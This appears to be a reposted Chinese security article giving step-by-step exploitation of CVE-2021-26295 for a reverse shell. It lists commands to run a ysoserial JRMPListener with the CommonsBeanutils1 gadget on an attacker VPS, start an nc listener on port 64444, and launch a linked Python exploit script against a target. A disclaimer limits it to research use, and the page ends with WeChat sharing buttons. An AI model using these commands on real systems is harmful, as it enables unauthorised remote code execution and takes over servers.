CVE-2021-26295
CVE-2021-26295 EXP可成功反弹壳牌
本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。
触发命令执行EXP
1. VPS启动RMI
监听9999
端口
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] '
2. VPS启动nc
监听64444
端口
nc -lvp 64444
3.执行python脚本
python3 cve-2021-26295_exp.py <目标> < vps_ip > < vps_port >
示例
可以利用
https://github.com/r0ckysec/CVE-2021-26295/blob/main/cve-2021-26295_exp.py
本文始发于微信公众号(Ots安全):CVE-2021-26295 EXP
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论